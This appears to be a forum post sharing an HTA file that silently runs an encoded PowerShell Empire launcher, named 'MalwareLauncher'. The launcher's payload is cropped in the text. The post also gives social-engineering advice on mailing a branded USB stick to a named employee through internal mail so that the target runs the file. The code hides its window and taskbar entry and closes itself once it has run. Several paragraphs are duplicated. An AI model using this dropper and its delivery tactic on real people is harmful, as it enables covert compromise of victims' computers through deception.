Tweet
This is a small example of an HTML Application (HTA) that will execute a Powershell script when executed. Getting HTA to run in a modern browser might not be that easy but it runs perfectly when executed directly and it will not inherit the limitations the browser will put on it. The thought behind this is a HTA script on a USB stick with an enticing filename maybe amongst other files that may look harmless but interesting. The script will give a warning when executed but this is no different than most Java launchers.
Yes, I am saying you need the user to click it but it is a lot less offensive that scripts that flash on the screen. Not all victims are that easy anymore and organizations do spend a lot of money and energy on awareness training. You can still drop a handful of USB sticks on the parking lot outside the target business but it do cost a bit, require you to prepare them all and chances are that users will either hand them over to security staff or bring them home. If this is part of a penetration test, attacking employee home computers is likely out of scope.
One fairly easy way to get an employee to plug in a USB device and actually execute a file may be as easy as putting just one USB stick in an envelope and putting the name of the target on it and sending it to the user. If possible with internal company mail and in an envelope with the organization logo on.
Think about it! The employee arrives at his desk and on it is an envelope with the business logo and his name on it. There is a good chance the user will feel perfectly safe plugging it in and investigate the content.
Needless to say the filename should be something that would look work related or at least interesting. Having the business logo on the USB stick itself will also increase the chance of success.
There is no flashy HTML in this script but it will execute minimized with no indications in the process bar and will only need a few seconds to execute the launcher or what ever you decide to execute.
Feel free to play around with it and modify or improve it in whatever manner you like.
Yes, I am saying you need the user to click it but it is a lot less offensive that scripts that flash on the screen. Not all victims are that easy anymore and organizations do spend a lot of money and energy on awareness training. You can still drop a handful of USB sticks on the parking lot outside the target business but it do cost a bit, require you to prepare them all and chances are that users will either hand them over to security staff or bring them home. If this is part of a penetration test, attacking employee home computers is likely out of scope.
One fairly easy way to get an employee to plug in a USB device and actually execute a file may be as easy as putting just one USB stick in an envelope and putting the name of the target on it and sending it to the user. If possible with internal company mail and in an envelope with the organization logo on.
Think about it! The employee arrives at his desk and on it is an envelope with the business logo and his name on it. There is a good chance the user will feel perfectly safe plugging it in and investigate the content.
Code:
[FONT=Monospace][COLOR=#3364a4]<[/COLOR][COLOR=#3364a4]html[/COLOR][COLOR=#333333]>[/COLOR]
[COLOR=#3364a4]<[/COLOR][COLOR=#3364a4]head[/COLOR][COLOR=#333333]>[/COLOR]
[COLOR=#3364a4]<[/COLOR][COLOR=#3364a4]title[/COLOR][COLOR=#333333]>[/COLOR][COLOR=#3364a4]</[/COLOR][COLOR=#3364a4]title[/COLOR][COLOR=#3364a4]>[/COLOR]
[COLOR=#3364a4]<[/COLOR][COLOR=#3364a4]HTA[/COLOR][COLOR=#3364a4]:APPLICATION[/COLOR]
[COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#333333]ID[/COLOR][COLOR=#3364a4]=[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#f57d00]oMalHTA[/COLOR][COLOR=#f57d00]"[/COLOR]
[COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#333333]APPLICATIONNAME[/COLOR][COLOR=#3364a4]=[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#f57d00]MalwareLauncher[/COLOR][COLOR=#f57d00]"[/COLOR]
[COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#333333]SCROLL[/COLOR][COLOR=#3364a4]=[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#f57d00]no[/COLOR][COLOR=#f57d00]"[/COLOR]
[COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#333333]SINGLEINSTANCE[/COLOR][COLOR=#3364a4]=[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#f57d00]yes[/COLOR][COLOR=#f57d00]"[/COLOR]
[COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#333333]WINDOWSTATE[/COLOR][COLOR=#3364a4]=[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#f57d00]minimize[/COLOR][COLOR=#f57d00]"[/COLOR]
[COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#333333]BORDER[/COLOR][COLOR=#3364a4]=[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#f57d00]none[/COLOR][COLOR=#f57d00]"[/COLOR]
[COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#333333]contextMenu[/COLOR][COLOR=#3364a4]=[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#f57d00]no[/COLOR][COLOR=#f57d00]"[/COLOR]
[COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#333333]CAPTION[/COLOR][COLOR=#3364a4]=[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#f57d00]no[/COLOR][COLOR=#f57d00]"[/COLOR]
[COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#333333]SHOWINTASKBAR[/COLOR][COLOR=#3364a4]=[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#f57d00]no[/COLOR][COLOR=#f57d00]"[/COLOR]
[COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#333333]SYSMENU[/COLOR][COLOR=#3364a4]=[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#f57d00]no[/COLOR][COLOR=#f57d00]"[/COLOR]
[COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#333333]MaximizeButton[/COLOR][COLOR=#3364a4]=[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#f57d00]no[/COLOR][COLOR=#f57d00]"[/COLOR]
[COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#333333]MinimizeButton[/COLOR][COLOR=#3364a4]=[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#f57d00]no[/COLOR][COLOR=#f57d00]"[/COLOR]
[COLOR=#333333]>[/COLOR]
[COLOR=#3364a4]</[/COLOR][COLOR=#3364a4]head[/COLOR][COLOR=#3364a4]>[/COLOR]
[COLOR=#333333] [/COLOR]
[COLOR=#3364a4]<[/COLOR][COLOR=#3364a4]SCRIPT[/COLOR][COLOR=#3364a4] [/COLOR][COLOR=#333333]Language[/COLOR][COLOR=#3364a4]=[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#f57d00]VBScript[/COLOR][COLOR=#f57d00]"[/COLOR][COLOR=#333333]>[/COLOR]
[COLOR=#333333]Dim objShell[/COLOR]
[COLOR=#333333]Set objShell = CreateObject("Wscript.Shell")[/COLOR]
[COLOR=#333333]objShell.Run "powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMA...cropped Empire Launcher...AfABJAEUAWAA="[/COLOR]
[COLOR=#333333]self.close()[/COLOR]
[COLOR=#3364a4]</[/COLOR][COLOR=#3364a4]SCRIPT[/COLOR][COLOR=#3364a4]>[/COLOR]
[COLOR=#3364a4]<[/COLOR][COLOR=#3364a4]body[/COLOR][COLOR=#333333]>[/COLOR]
[COLOR=#3364a4]</[/COLOR][COLOR=#3364a4]body[/COLOR][COLOR=#3364a4]>[/COLOR]
[COLOR=#3364a4]</[/COLOR][COLOR=#3364a4]html[/COLOR][COLOR=#3364a4]>[/COLOR][/FONT]
There is no flashy HTML in this script but it will execute minimized with no indications in the process bar and will only need a few seconds to execute the launcher or what ever you decide to execute.
Feel free to play around with it and modify or improve it in whatever manner you like.